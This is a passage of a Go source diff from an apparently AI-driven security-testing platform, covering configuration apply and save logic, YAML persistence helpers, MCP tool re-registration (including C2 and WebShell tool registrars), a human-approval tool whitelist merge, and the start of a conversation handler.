err.Error()}) + return + } + h.logger.Info("知识库组件重新初始化完成") + } + + // C2:在 ClearTools 之前按配置启停(随后由 c2ToolRegistrar 注册 MCP 工具) + h.mu.RLock() + c2Rt := h.c2Runtime + h.mu.RUnlock() + if c2Rt != nil { + if err := c2Rt.ReconcileC2AfterConfigApply(); err != nil { + h.logger.Error("C2 配置应用失败", zap.Error(err)) + if h.audit != nil { + h.audit.RecordFail(c, "config", "apply", "应用配置失败:C2", map[string]interface{}{"error": err.Error()}) + } + c.JSON(http.StatusInternalServerError, gin.H{"error": "C2 启动失败: " + err.Error()}) + return + } + } + + // 现在获取写锁,执行快速的操作 + h.mu.Lock() + defer h.mu.Unlock() + + // 如果重新初始化了知识库,更新嵌入模型配置记录 + if needReinitKnowledge && h.config.Knowledge.Enabled { + h.lastEmbeddingConfig = &config.EmbeddingConfig{ + Provider: h.config.Knowledge.Embedding.Provider, + Model: h.config.Knowledge.Embedding.Model, + BaseURL: h.config.Knowledge.Embedding.BaseURL, + APIKey: h.config.Knowledge.Embedding.APIKey, + } + h.logger.Info("已更新嵌入模型配置记录") + } + + // 重新注册工具(根据新的启用状态) + h.logger.Info("重新注册工具") + + // 清空MCP服务器中的工具 + h.mcpServer.ClearTools() + + // 重新注册安全工具 + h.executor.RegisterTools(h.mcpServer) + + // 重新注册漏洞记录工具(内置工具,必须注册) + if h.vulnerabilityToolRegistrar != nil { + h.logger.Info("重新注册漏洞记录工具") + if err := h.vulnerabilityToolRegistrar(); err != nil { + h.logger.Error("重新注册漏洞记录工具失败", zap.Error(err)) + } else { + h.logger.Info("漏洞记录工具已重新注册") + } + } + + // 重新注册 WebShell 工具(内置工具,必须注册) + if h.webshellToolRegistrar != nil { + h.logger.Info("重新注册 WebShell 工具") + if err := h.webshellToolRegistrar(); err != nil { + h.logger.Error("重新注册 WebShell 工具失败", zap.Error(err)) + } else { + h.logger.Info("WebShell 工具已重新注册") + } + } + + // 重新注册Skills工具(内置工具,必须注册) + if h.skillsToolRegistrar != nil { + h.logger.Info("重新注册Skills工具") + if err := h.skillsToolRegistrar(); err != nil { + h.logger.Error("重新注册Skills工具失败", zap.Error(err)) + } else { + h.logger.Info("Skills工具已重新注册") + } + } + + // 重新注册批量任务 MCP 工具 + if h.batchTaskToolRegistrar != nil { + h.logger.Info("重新注册批量任务 MCP 工具") + if err := h.batchTaskToolRegistrar(); err != nil { + h.logger.Error("重新注册批量任务 MCP 工具失败", zap.Error(err)) + } else { + h.logger.Info("批量任务 MCP 工具已重新注册") + } + } + + // 重新注册 C2 MCP 工具(仅当 C2 已启动) + if h.c2ToolRegistrar != nil { + h.logger.Info("重新注册 C2 MCP 工具") + if err := h.c2ToolRegistrar(); err != nil { + h.logger.Error("重新注册 C2 MCP 工具失败", zap.Error(err)) + } else { + h.logger.Info("C2 MCP 工具已处理") + } + } + + // 如果知识库启用,重新注册知识库工具 + if h.config.Knowledge.Enabled && h.knowledgeToolRegistrar != nil { + h.logger.Info("重新注册知识库工具") + if err := h.knowledgeToolRegistrar(); err != nil { + h.logger.Error("重新注册知识库工具失败", zap.Error(err)) + } else { + h.logger.Info("知识库工具已重新注册") + } + } + + // 更新Agent的OpenAI配置 + if h.agent != nil { + h.agent.UpdateConfig(&h.config.OpenAI) + h.agent.UpdateMaxIterations(h.config.Agent.MaxIterations) + h.agent.UpdateToolDescriptionMode(h.config.Security.ToolDescriptionMode) + h.logger.Info("Agent配置已更新") + } + if h.mcpServer != nil { + h.mcpServer.ConfigureHTTPToolCallTimeoutFromAgentMinutes(h.config.Agent.ToolTimeoutMinutes) + } + + // 更新AttackChainHandler的OpenAI配置 + if h.attackChainHandler != nil { + h.attackChainHandler.UpdateConfig(&h.config.OpenAI) + h.logger.Info("AttackChainHandler配置已更新") + } + + // 更新检索器配置(如果知识库启用) + if h.config.Knowledge.Enabled && h.retrieverUpdater != nil { + retrievalConfig := &knowledge.RetrievalConfig{ + TopK: h.config.Knowledge.Retrieval.TopK, + SimilarityThreshold: h.config.Knowledge.Retrieval.SimilarityThreshold, + SubIndexFilter: h.config.Knowledge.Retrieval.SubIndexFilter, + PostRetrieve: h.config.Knowledge.Retrieval.PostRetrieve, + } + h.retrieverUpdater.UpdateConfig(retrievalConfig) + h.logger.Info("检索器配置已更新", + zap.Int("top_k", retrievalConfig.TopK), + zap.Float64("similarity_threshold", retrievalConfig.SimilarityThreshold), + ) + } + + // 更新嵌入模型配置记录(如果知识库启用) + if h.config.Knowledge.Enabled { + h.lastEmbeddingConfig = &config.EmbeddingConfig{ + Provider: h.config.Knowledge.Embedding.Provider, + Model: h.config.Knowledge.Embedding.Model, + BaseURL: h.config.Knowledge.Embedding.BaseURL, + APIKey: h.config.Knowledge.Embedding.APIKey, + } + } + + // 重启钉钉/飞书长连接,使前端修改的机器人配置立即生效(无需重启服务) + if h.robotRestarter != nil { + h.robotRestarter.RestartRobotConnections() + h.logger.Info("已触发机器人连接重启(钉钉/飞书)") + } + + h.logger.Info("配置已应用", + zap.Int("tools_count", len(h.config.Security.Tools)), + ) + + if h.audit != nil { + h.audit.Record(c, audit.Entry{ + Category: "config", + Action: "apply", + Result: "success", + Message: "配置已应用", + Detail: map[string]interface{}{ + "tools_count": len(h.config.Security.Tools), + "knowledge_enabled": h.config.Knowledge.Enabled, + "c2_enabled": h.config.C2.EnabledEffective(), + }, + }) + } + + c.JSON(http.StatusOK, gin.H{ + "message": "配置已应用", + "tools_count": len(h.config.Security.Tools), + }) +} + +// saveConfig 保存配置到文件 +func (h *ConfigHandler) saveConfig() error { + // 读取现有配置文件并创建备份 + data, err := os.ReadFile(h.configPath) + if err != nil { + return fmt.Errorf("读取配置文件失败: %w", err) + } + + if err := os.WriteFile(h.configPath+".backup", data, 0644); err != nil { + h.logger.Warn("创建配置备份失败", zap.Error(err)) + } + + root, err := loadYAMLDocument(h.configPath) + if err != nil { + return fmt.Errorf("解析配置文件失败: %w", err) + } + + updateAgentConfig(root, h.config.Agent) + updateMCPConfig(root, h.config.MCP) + updateOpenAIConfig(root, h.config.OpenAI) + updateVisionConfig(root, h.config.Vision) + updateFOFAConfig(root, h.config.FOFA) + updateKnowledgeConfig(root, h.config.Knowledge) + updateC2Config(root, h.config.C2) + updateRobotsConfig(root, h.config.Robots) + updateHitlConfig(root, h.config.Hitl) + updateMultiAgentConfig(root, h.config.MultiAgent) + // 更新外部MCP配置(使用external_mcp.go中的函数,同一包中可直接调用) + updateExternalMCPConfig(root, h.config.ExternalMCP) + + if err := writeYAMLDocument(h.configPath, root); err != nil { + return fmt.Errorf("保存配置文件失败: %w", err) + } + + // 更新工具配置文件中的enabled状态 + if h.config.Security.ToolsDir != "" { + configDir := filepath.Dir(h.configPath) + toolsDir := h.config.Security.ToolsDir + if !filepath.IsAbs(toolsDir) { + toolsDir = filepath.Join(configDir, toolsDir) + } + + for _, tool := range h.config.Security.Tools { + toolFile := filepath.Join(toolsDir, tool.Name+".yaml") + // 检查文件是否存在 + if _, err := os.Stat(toolFile); os.IsNotExist(err) { + // 尝试.yml扩展名 + toolFile = filepath.Join(toolsDir, tool.Name+".yml") + if _, err := os.Stat(toolFile); os.IsNotExist(err) { + h.logger.Warn("工具配置文件不存在", zap.String("tool", tool.Name)) + continue + } + } + + toolDoc, err := loadYAMLDocument(toolFile) + if err != nil { + h.logger.Warn("解析工具配置失败", zap.String("tool", tool.Name), zap.Error(err)) + continue + } + + setBoolInMap(toolDoc.Content[0], "enabled", tool.Enabled) + + if err := writeYAMLDocument(toolFile, toolDoc); err != nil { + h.logger.Warn("保存工具配置文件失败", zap.String("tool", tool.Name), zap.Error(err)) + continue + } + + h.logger.Info("更新工具配置", zap.String("tool", tool.Name), zap.Bool("enabled", tool.Enabled)) + } + } + + h.logger.Info("配置已保存", zap.String("path", h.configPath)) + return nil +} + +func loadYAMLDocument(path string) (*yaml.Node, error) { + data, err := os.ReadFile(path) + if err != nil { + return nil, err + } + + if len(bytes.TrimSpace(data)) == 0 { + return newEmptyYAMLDocument(), nil + } + + var doc yaml.Node + if err := yaml.Unmarshal(data, &doc); err != nil { + return nil, err + } + + if doc.Kind != yaml.DocumentNode || len(doc.Content) == 0 { + return newEmptyYAMLDocument(), nil + } + + if doc.Content[0].Kind != yaml.MappingNode { + root := &yaml.Node{Kind: yaml.MappingNode, Tag: "!!map"} + doc.Content = []*yaml.Node{root} + } + + return &doc, nil +} + +func newEmptyYAMLDocument() *yaml.Node { + root := &yaml.Node{ + Kind: yaml.DocumentNode, + Content: []*yaml.Node{{Kind: yaml.MappingNode, Tag: "!!map"}}, + } + return root +} + +func writeYAMLDocument(path string, doc *yaml.Node) error { + var buf bytes.Buffer + encoder := yaml.NewEncoder(&buf) + encoder.SetIndent(2) + if err := encoder.Encode(doc); err != nil { + return err + } + if err := encoder.Close(); err != nil { + return err + } + return os.WriteFile(path, buf.Bytes(), 0644) +} + +func updateAgentConfig(doc *yaml.Node, agent config.AgentConfig) { + root := doc.Content[0] + agentNode := ensureMap(root, "agent") + setIntInMap(agentNode, "max_iterations", agent.MaxIterations) + setIntInMap(agentNode, "tool_timeout_minutes", agent.ToolTimeoutMinutes) + setStringInMap(agentNode, "system_prompt_path", agent.SystemPromptPath) +} + +func updateMCPConfig(doc *yaml.Node, cfg config.MCPConfig) { + root := doc.Content[0] + mcpNode := ensureMap(root, "mcp") + setBoolInMap(mcpNode, "enabled", cfg.Enabled) + setStringInMap(mcpNode, "host", cfg.Host) + setIntInMap(mcpNode, "port", cfg.Port) +} + +func updateVisionConfig(doc *yaml.Node, cfg config.VisionConfig) { + root := doc.Content[0] + visionNode := ensureMap(root, "vision") + setBoolInMap(visionNode, "enabled", cfg.Enabled) + if strings.TrimSpace(cfg.APIKey) != "" { + setStringInMap(visionNode, "api_key", cfg.APIKey) + } else { + setStringInMap(visionNode, "api_key", "") + } + if strings.TrimSpace(cfg.BaseURL) != "" { + setStringInMap(visionNode, "base_url", cfg.BaseURL) + } else { + setStringInMap(visionNode, "base_url", "") + } + setStringInMap(visionNode, "model", cfg.Model) + if strings.TrimSpace(cfg.Provider) != "" { + setStringInMap(visionNode, "provider", cfg.Provider) + } + if cfg.TimeoutSeconds > 0 { + setIntInMap(visionNode, "timeout_seconds", cfg.TimeoutSeconds) + } + if cfg.MaxImageBytes > 0 { + setIntInMap(visionNode, "max_image_bytes", int(cfg.MaxImageBytes)) + } + if cfg.MaxDimension > 0 { + setIntInMap(visionNode, "max_dimension", cfg.MaxDimension) + } + if cfg.JPEGQuality > 0 { + setIntInMap(visionNode, "jpeg_quality", cfg.JPEGQuality) + } + if cfg.MaxPayloadBytes > 0 { + setIntInMap(visionNode, "max_payload_bytes", int(cfg.MaxPayloadBytes)) + } + setIntInMap(visionNode, "skip_preprocess_below_bytes", int(cfg.SkipPreprocessBelowBytes)) + if strings.TrimSpace(cfg.Detail) != "" { + setStringInMap(visionNode, "detail", cfg.Detail) + } +} + +func updateOpenAIConfig(doc *yaml.Node, cfg config.OpenAIConfig) { + root := doc.Content[0] + openaiNode := ensureMap(root, "openai") + if cfg.Provider != "" { + setStringInMap(openaiNode, "provider", cfg.Provider) + } + setStringInMap(openaiNode, "api_key", cfg.APIKey) + setStringInMap(openaiNode, "base_url", cfg.BaseURL) + setStringInMap(openaiNode, "model", cfg.Model) + if cfg.MaxTotalTokens > 0 { + setIntInMap(openaiNode, "max_total_tokens", cfg.MaxTotalTokens) + } + rn := ensureMap(openaiNode, "reasoning") + if strings.TrimSpace(cfg.Reasoning.Mode) != "" { + setStringInMap(rn, "mode", cfg.Reasoning.Mode) + } + if strings.TrimSpace(cfg.Reasoning.Effort) != "" { + setStringInMap(rn, "effort", cfg.Reasoning.Effort) + } + if cfg.Reasoning.AllowClientReasoning != nil { + setBoolInMap(rn, "allow_client_reasoning", *cfg.Reasoning.AllowClientReasoning) + } + if strings.TrimSpace(cfg.Reasoning.Profile) != "" { + setStringInMap(rn, "profile", cfg.Reasoning.Profile) + } +} + +func updateFOFAConfig(doc *yaml.Node, cfg config.FofaConfig) { + root := doc.Content[0] + fofaNode := ensureMap(root, "fofa") + setStringInMap(fofaNode, "base_url", cfg.BaseURL) + setStringInMap(fofaNode, "email", cfg.Email) + setStringInMap(fofaNode, "api_key", cfg.APIKey) +} + +func updateKnowledgeConfig(doc *yaml.Node, cfg config.KnowledgeConfig) { + root := doc.Content[0] + knowledgeNode := ensureMap(root, "knowledge") + setBoolInMap(knowledgeNode, "enabled", cfg.Enabled) + setStringInMap(knowledgeNode, "base_path", cfg.BasePath) + + // 更新嵌入配置 + embeddingNode := ensureMap(knowledgeNode, "embedding") + setStringInMap(embeddingNode, "provider", cfg.Embedding.Provider) + setStringInMap(embeddingNode, "model", cfg.Embedding.Model) + if cfg.Embedding.BaseURL != "" { + setStringInMap(embeddingNode, "base_url", cfg.Embedding.BaseURL) + } + if cfg.Embedding.APIKey != "" { + setStringInMap(embeddingNode, "api_key", cfg.Embedding.APIKey) + } + + // 更新检索配置 + retrievalNode := ensureMap(knowledgeNode, "retrieval") + setIntInMap(retrievalNode, "top_k", cfg.Retrieval.TopK) + setFloatInMap(retrievalNode, "similarity_threshold", cfg.Retrieval.SimilarityThreshold) + setStringInMap(retrievalNode, "sub_index_filter", cfg.Retrieval.SubIndexFilter) + postNode := ensureMap(retrievalNode, "post_retrieve") + setIntInMap(postNode, "prefetch_top_k", cfg.Retrieval.PostRetrieve.PrefetchTopK) + setIntInMap(postNode, "max_context_chars", cfg.Retrieval.PostRetrieve.MaxContextChars) + setIntInMap(postNode, "max_context_tokens", cfg.Retrieval.PostRetrieve.MaxContextTokens) + + // 更新索引配置 + indexingNode := ensureMap(knowledgeNode, "indexing") + setStringInMap(indexingNode, "chunk_strategy", cfg.Indexing.ChunkStrategy) + setIntInMap(indexingNode, "request_timeout_seconds", cfg.Indexing.RequestTimeoutSeconds) + setIntInMap(indexingNode, "chunk_size", cfg.Indexing.ChunkSize) + setIntInMap(indexingNode, "chunk_overlap", cfg.Indexing.ChunkOverlap) + setIntInMap(indexingNode, "max_chunks_per_item", cfg.Indexing.MaxChunksPerItem) + setBoolInMap(indexingNode, "prefer_source_file", cfg.Indexing.PreferSourceFile) + setIntInMap(indexingNode, "batch_size", cfg.Indexing.BatchSize) + setStringSliceInMap(indexingNode, "sub_indexes", cfg.Indexing.SubIndexes) + setIntInMap(indexingNode, "max_rpm", cfg.Indexing.MaxRPM) + setIntInMap(indexingNode, "rate_limit_delay_ms", cfg.Indexing.RateLimitDelayMs) + setIntInMap(indexingNode, "max_retries", cfg.Indexing.MaxRetries) + setIntInMap(indexingNode, "retry_delay_ms", cfg.Indexing.RetryDelayMs) +} + +func updateC2Config(doc *yaml.Node, cfg config.C2Config) { + root := doc.Content[0] + c2Node := ensureMap(root, "c2") + setBoolInMap(c2Node, "enabled", cfg.EnabledEffective()) +} + +func mergeHitlToolWhitelistSlice(existing, add []string) []string { + seen := make(map[string]struct{}) + out := make([]string, 0, len(existing)+len(add)) + for _, list := range [][]string{existing, add} { + for _, t := range list { + n := strings.ToLower(strings.TrimSpace(t)) + if n == "" { + continue + } + if _, ok := seen[n]; ok { + continue + } + seen[n] = struct{}{} + out = append(out, strings.TrimSpace(t)) + } + } + return out +} + +// MergeHitlToolWhitelistIntoConfig 将会话侧栏提交的免审批工具名合并进内存配置并写入 config.yaml(与全局白名单去重规则一致:小写键、保留首次出现的原始大小写)。 +func (h *ConfigHandler) MergeHitlToolWhitelistIntoConfig(add []string) error { + h.mu.Lock() + defer h.mu.Unlock() + merged := mergeHitlToolWhitelistSlice(h.config.Hitl.ToolWhitelist, add) + h.config.Hitl.ToolWhitelist = merged + if err := h.saveConfig(); err != nil { + return err + } + h.logger.Info("HITL 全局工具白名单已合并写入配置文件", + zap.Int("count", len(merged)), + ) + return nil +} + +func updateHitlConfig(doc *yaml.Node, cfg config.HitlConfig) { + root := doc.Content[0] + hitlNode := ensureMap(root, "hitl") + // flow 样式 [a, b, c] 单行展示,工具多时比块序列省行数 + setFlowStringSliceInMap(hitlNode, "tool_whitelist", cfg.ToolWhitelist) +} + +func updateRobotsConfig(doc *yaml.Node, cfg config.RobotsConfig) { + root := doc.Content[0] + robotsNode := ensureMap(root, "robots") + + if cfg.Session.StrictUserIdentity != nil { + sessionNode := ensureMap(robotsNode, "session") + setBoolInMap(sessionNode, "strict_user_identity", *cfg.Session.StrictUserIdentity) + } + + wechatNode := ensureMap(robotsNode, "wechat") + setBoolInMap(wechatNode, "enabled", cfg.Wechat.Enabled) + setStringInMap(wechatNode, "bot_token", cfg.Wechat.BotToken) + setStringInMap(wechatNode, "ilink_bot_id", cfg.Wechat.ILinkBotID) + setStringInMap(wechatNode, "ilink_user_id", cfg.Wechat.ILinkUserID) + setStringInMap(wechatNode, "base_url", cfg.Wechat.BaseURL) + setStringInMap(wechatNode, "bot_type", cfg.Wechat.BotType) + setStringInMap(wechatNode, "bot_agent", cfg.Wechat.BotAgent) + + wecomNode := ensureMap(robotsNode, "wecom") + setBoolInMap(wecomNode, "enabled", cfg.Wecom.Enabled) + setStringInMap(wecomNode, "token", cfg.Wecom.Token) + setStringInMap(wecomNode, "encoding_aes_key", cfg.Wecom.EncodingAESKey) + setStringInMap(wecomNode, "corp_id", cfg.Wecom.CorpID) + setStringInMap(wecomNode, "secret", cfg.Wecom.Secret) + setIntInMap(wecomNode, "agent_id", int(cfg.Wecom.AgentID)) + + dingtalkNode := ensureMap(robotsNode, "dingtalk") + setBoolInMap(dingtalkNode, "enabled", cfg.Dingtalk.Enabled) + setStringInMap(dingtalkNode, "client_id", cfg.Dingtalk.ClientID) + setStringInMap(dingtalkNode, "client_secret", cfg.Dingtalk.ClientSecret) + setBoolInMap(dingtalkNode, "allow_conversation_id_fallback", cfg.Dingtalk.AllowConversationIDFallback) + + larkNode := ensureMap(robotsNode, "lark") + setBoolInMap(larkNode, "enabled", cfg.Lark.Enabled) + setStringInMap(larkNode, "app_id", cfg.Lark.AppID) + setStringInMap(larkNode, "app_secret", cfg.Lark.AppSecret) + setStringInMap(larkNode, "verify_token", cfg.Lark.VerifyToken) + setBoolInMap(larkNode, "allow_chat_id_fallback", cfg.Lark.AllowChatIDFallback) +} + +func updateMultiAgentConfig(doc *yaml.Node, cfg config.MultiAgentConfig) { + root := doc.Content[0] + maNode := ensureMap(root, "multi_agent") + setBoolInMap(maNode, "enabled", cfg.Enabled) + setStringInMap(maNode, "robot_default_agent_mode", config.NormalizeRobotAgentMode(cfg)) + setBoolInMap(maNode, "batch_use_multi_agent", cfg.BatchUseMultiAgent) + setIntInMap(maNode, "plan_execute_loop_max_iterations", cfg.PlanExecuteLoopMaxIterations) + mwNode := ensureMap(maNode, "eino_middleware") + setFlowStringSliceInMap(mwNode, "tool_search_always_visible_tools", dedupeToolNameList(cfg.EinoMiddleware.ToolSearchAlwaysVisibleTools)) +} + +func dedupeToolNameList(in []string) []string { + if len(in) == 0 { + return []string{} + } + seen := make(map[string]struct{}, len(in)) + out := make([]string, 0, len(in)) + for _, name := range in { + n := strings.TrimSpace(name) + if n == "" { + continue + } + key := strings.ToLower(n) + if _, ok := seen[key]; ok { + continue + } + seen[key] = struct{}{} + out = append(out, n) + } + return out +} + +func mergeToolNameLists(a, b []string) []string { + return dedupeToolNameList(append(append([]string{}, a...), b...)) +} + +func ensureMap(parent *yaml.Node, path ...string) *yaml.Node { + current := parent + for _, key := range path { + value := findMapValue(current, key) + if value == nil { + keyNode := &yaml.Node{Kind: yaml.ScalarNode, Tag: "!!str", Value: key} + mapNode := &yaml.Node{Kind: yaml.MappingNode, Tag: "!!map"} + current.Content = append(current.Content, keyNode, mapNode) + value = mapNode + } + + if value.Kind != yaml.MappingNode { + value.Kind = yaml.MappingNode + value.Tag = "!!map" + value.Style = 0 + value.Content = nil + } + + current = value + } + + return current +} + +func findMapValue(mapNode *yaml.Node, key string) *yaml.Node { + if mapNode == nil || mapNode.Kind != yaml.MappingNode { + return nil + } + + for i := 0; i < len(mapNode.Content); i += 2 { + if mapNode.Content[i].Value == key { + return mapNode.Content[i+1] + } + } + return nil +} + +func ensureKeyValue(mapNode *yaml.Node, key string) (*yaml.Node, *yaml.Node) { + if mapNode == nil || mapNode.Kind != yaml.MappingNode { + return nil, nil + } + + for i := 0; i < len(mapNode.Content); i += 2 { + if mapNode.Content[i].Value == key { + return mapNode.Content[i], mapNode.Content[i+1] + } + } + + keyNode := &yaml.Node{Kind: yaml.ScalarNode, Tag: "!!str", Value: key} + valueNode := &yaml.Node{} + mapNode.Content = append(mapNode.Content, keyNode, valueNode) + return keyNode, valueNode +} + +func setStringInMap(mapNode *yaml.Node, key, value string) { + _, valueNode := ensureKeyValue(mapNode, key) + valueNode.Kind = yaml.ScalarNode + valueNode.Tag = "!!str" + valueNode.Style = 0 + valueNode.Value = value +} + +func setStringSliceInMap(mapNode *yaml.Node, key string, values []string) { + _, valueNode := ensureKeyValue(mapNode, key) + valueNode.Kind = yaml.SequenceNode + valueNode.Tag = "!!seq" + valueNode.Style = 0 + valueNode.Content = nil + for _, v := range values { + valueNode.Content = append(valueNode.Content, &yaml.Node{ + Kind: yaml.ScalarNode, + Tag: "!!str", + Value: v, + }) + } +} + +func setFlowStringSliceInMap(mapNode *yaml.Node, key string, values []string) { + _, valueNode := ensureKeyValue(mapNode, key) + valueNode.Kind = yaml.SequenceNode + valueNode.Tag = "!!seq" + valueNode.Style = yaml.FlowStyle + valueNode.Content = nil + for _, v := range values { + valueNode.Content = append(valueNode.Content, &yaml.Node{ + Kind: yaml.ScalarNode, + Tag: "!!str", + Value: v, + }) + } +} + +func setIntInMap(mapNode *yaml.Node, key string, value int) { + _, valueNode := ensureKeyValue(mapNode, key) + valueNode.Kind = yaml.ScalarNode + valueNode.Tag = "!!int" + valueNode.Style = 0 + valueNode.Value = fmt.Sprintf("%d", value) +} + +func findBoolInMap(mapNode *yaml.Node, key string) *bool { + if mapNode == nil || mapNode.Kind != yaml.MappingNode { + return nil + } + + for i := 0; i < len(mapNode.Content); i += 2 { + if i+1 >= len(mapNode.Content) { + break + } + keyNode := mapNode.Content[i] + valueNode := mapNode.Content[i+1] + + if keyNode.Kind == yaml.ScalarNode && keyNode.Value == key { + if valueNode.Kind == yaml.ScalarNode { + if valueNode.Value == "true" { + result := true + return &result + } else if valueNode.Value == "false" { + result := false + return &result + } + } + return nil + } + } + return nil +} + +func setBoolInMap(mapNode *yaml.Node, key string, value bool) { + _, valueNode := ensureKeyValue(mapNode, key) + valueNode.Kind = yaml.ScalarNode + valueNode.Tag = "!!bool" + valueNode.Style = 0 + if value { + valueNode.Value = "true" + } else { + valueNode.Value = "false" + } +} + +func setFloatInMap(mapNode *yaml.Node, key string, value float64) { + _, valueNode := ensureKeyValue(mapNode, key) + valueNode.Kind = yaml.ScalarNode + valueNode.Tag = "!!float" + valueNode.Style = 0 + // 对于0.0到1.0之间的值(如 similarity_threshold),使用%.1f确保0.0被明确序列化为"0.0" + // 对于其他值,使用%g自动选择最合适的格式 + if value >= 0.0 && value <= 1.0 { + valueNode.Value = fmt.Sprintf("%.1f", value) + } else { + valueNode.Value = fmt.Sprintf("%g", value) + } +} + +// getExternalMCPTools 获取外部MCP工具列表(公共方法) +func (h *ConfigHandler) getExternalMCPTools(ctx context.Context) []ToolConfigInfo { + if h.externalMCPMgr == nil { + return nil + } + return h.getExternalMCPToolsWithManager(ctx, h.externalMCPMgr, h.pickToolDescription) +} + +// getExternalMCPToolsWithManager 获取外部 MCP 工具(不持有 config 锁,供 GetTools 等热路径使用) +func (h *ConfigHandler) getExternalMCPToolsWithManager( + ctx context.Context, + mgr *mcp.ExternalMCPManager, + pickDesc func(shortDesc, fullDesc string) string, +) []ToolConfigInfo { + var result []ToolConfigInfo + if mgr == nil { + return result + } + + timeoutCtx, cancel := context.WithTimeout(ctx, 5*time.Second) + defer cancel() + + externalTools, err := mgr.GetAllTools(timeoutCtx) + if err != nil { + h.logger.Warn("获取外部MCP工具失败(可能连接断开),尝试返回缓存的工具", + zap.Error(err), + zap.String("hint", "如果外部MCP工具未显示,请检查连接状态或点击刷新按钮"), + ) + } + + if len(externalTools) == 0 { + return result + } + + externalMCPConfigs := mgr.GetConfigs() + + for _, externalTool := range externalTools { + mcpName, actualToolName := h.parseExternalToolName(externalTool.Name) + if mcpName == "" || actualToolName == "" { + continue + } + + enabled := h.calculateExternalToolEnabledWithManager(mcpName, actualToolName, externalMCPConfigs, mgr) + + result = append(result, ToolConfigInfo{ + Name: actualToolName, + Description: pickDesc(externalTool.ShortDescription, externalTool.Description), + Enabled: enabled, + IsExternal: true, + ExternalMCP: mcpName, + }) + } + + return result +} + +// parseExternalToolName 解析外部工具名称(格式:mcpName::toolName) +func (h *ConfigHandler) parseExternalToolName(fullName string) (mcpName, toolName string) { + idx := strings.Index(fullName, "::") + if idx > 0 { + return fullName[:idx], fullName[idx+2:] + } + return "", "" +} + +// calculateExternalToolEnabled 计算外部工具的启用状态 +func (h *ConfigHandler) calculateExternalToolEnabled(mcpName, toolName string, configs map[string]config.ExternalMCPServerConfig) bool { + return h.calculateExternalToolEnabledWithManager(mcpName, toolName, configs, h.externalMCPMgr) +} + +func (h *ConfigHandler) calculateExternalToolEnabledWithManager( + mcpName, toolName string, + configs map[string]config.ExternalMCPServerConfig, + mgr *mcp.ExternalMCPManager, +) bool { + cfg, exists := configs[mcpName] + if !exists { + return false + } + + if !cfg.ExternalMCPEnable { + return false + } + + if cfg.ToolEnabled != nil { + if toolEnabled, exists := cfg.ToolEnabled[toolName]; exists && !toolEnabled { + return false + } + } + + if mgr == nil { + return false + } + client, exists := mgr.GetClient(mcpName) + if !exists || !client.IsConnected() { + return false + } + + return true +} + +// pickToolDescription 根据 security.tool_description_mode 选择 short 或 full 描述并限制长度。 +// 调用方若已持有 h.mu 读锁,须直接读 mode 并调用 pickToolDescriptionWithMode,避免嵌套 RLock 死锁。 +func (h *ConfigHandler) pickToolDescription(shortDesc, fullDesc string) string { + return pickToolDescriptionWithMode(h.config.Security.ToolDescriptionMode, shortDesc, fullDesc) +} + +func pickToolDescriptionWithMode(mode, shortDesc, fullDesc string) string { + useFull := strings.TrimSpace(strings.ToLower(mode)) == "full" + description := shortDesc + if useFull { + description = fullDesc + } else if description == "" { + description = fullDesc + } + if len(description) > 10000 { + description = description[:10000] + "..." + } + return description +} + +// GetToolSchema 获取单个工具的 inputSchema(按需加载,避免列表接口返回大量 schema 数据) +func (h *ConfigHandler) GetToolSchema(c *gin.Context) { + toolName := c.Param("name") + if toolName == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "工具名称不能为空"}) + return + } + + externalMCP := c.Query("external_mcp") + if externalMCP != "" { + h.mu.RLock() + externalMCPMgr := h.externalMCPMgr + h.mu.RUnlock() + + if externalMCPMgr != nil { + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + externalTools, _ := externalMCPMgr.GetAllTools(ctx) + fullName := externalMCP + "::" + toolName + for _, t := range externalTools { + if t.Name == fullName { + c.JSON(http.StatusOK, gin.H{"input_schema": t.InputSchema}) + return + } + } + } + c.JSON(http.StatusNotFound, gin.H{"error": "外部工具未找到"}) + return + } + + h.mu.RLock() + securityTools := append([]config.ToolConfig(nil), h.config.Security.Tools...) + mcpServer := h.mcpServer + h.mu.RUnlock() + + for _, tool := range securityTools { + if tool.Name == toolName { + c.JSON(http.StatusOK, gin.H{"input_schema": buildInputSchemaFromParams(tool.Parameters)}) + return + } + } + + // MCP 注册工具(如知识检索) + if mcpServer != nil { + for _, mt := range mcpServer.GetAllTools() { + if mt.Name == toolName { + c.JSON(http.StatusOK, gin.H{"input_schema": mt.InputSchema}) + return + } + } + } + + c.JSON(http.StatusNotFound, gin.H{"error": "工具未找到"}) +} + +// buildInputSchemaFromParams 从 YAML 工具的 ParameterConfig 构建 JSON Schema(用于前端展示)。 +// 不依赖 MCP 服务器注册状态,所有工具(包括未启用的)都能返回参数定义。 +func buildInputSchemaFromParams(params []config.ParameterConfig) map[string]interface{} { + if len(params) == 0 { + return nil + } + + properties := make(map[string]interface{}) + required := make([]string, 0) + + for _, p := range params { + name := strings.TrimSpace(p.Name) + if name == "" { + continue + } + prop := map[string]interface{}{ + "type": convertParamType(p.Type), + "description": p.Description, + } + if p.Default != nil { + prop["default"] = p.Default + } + if len(p.Options) > 0 { + prop["enum"] = p.Options + } + properties[name] = prop + if p.Required { + required = append(required, name) + } + } + + schema := map[string]interface{}{ + "type": "object", + "properties": properties, + } + if len(required) > 0 { + schema["required"] = required + } + return schema +} + +func convertParamType(t string) string { + switch strings.TrimSpace(strings.ToLower(t)) { + case "int", "integer", "number": + return "number" + case "bool", "boolean": + return "boolean" + case "array", "list": + return "array" + default: + return "string" + } +} diff --git a/internal/handler/conversation.go b/internal/handler/conversation.go new file mode 100644 index 00000000..82215096 --- /dev/null +++ b/internal/handler/conversation.go @@ -0,0 +1,312 @@ +package handler + +import ( + "encoding/json" + "net/http" + "strconv" + "strings" + + "cyberstrike-ai/internal/audit" + "cyberstrike-ai/internal/database" + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +// ConversationHandler 对话处理器 +type ConversationHandler struct { + db *database.DB + logger *zap.Logger + audit *audit.Service +} + +// SetAudit wires platform audit logging. +func (h *ConversationHandler) SetAudit(s *audit.Service) { + h.audit = s +} + +// NewConversationHandler 创建新的对话处理器 +func NewConversationHandler(db *database.DB, logger *zap.Logger) *ConversationHandler { + return &ConversationHandler{ + db: db, + logger: logger, + } +} + +// CreateConversationRequest 创建对话请求 +type CreateConversationRequest struct { + Title string `json:"title"` + ProjectID string `json:"projectId,omitempty"` +} + +// SetConversationProjectRequest 设置对话所属项目 +type SetConversationProjectRequest struct { + ProjectID string 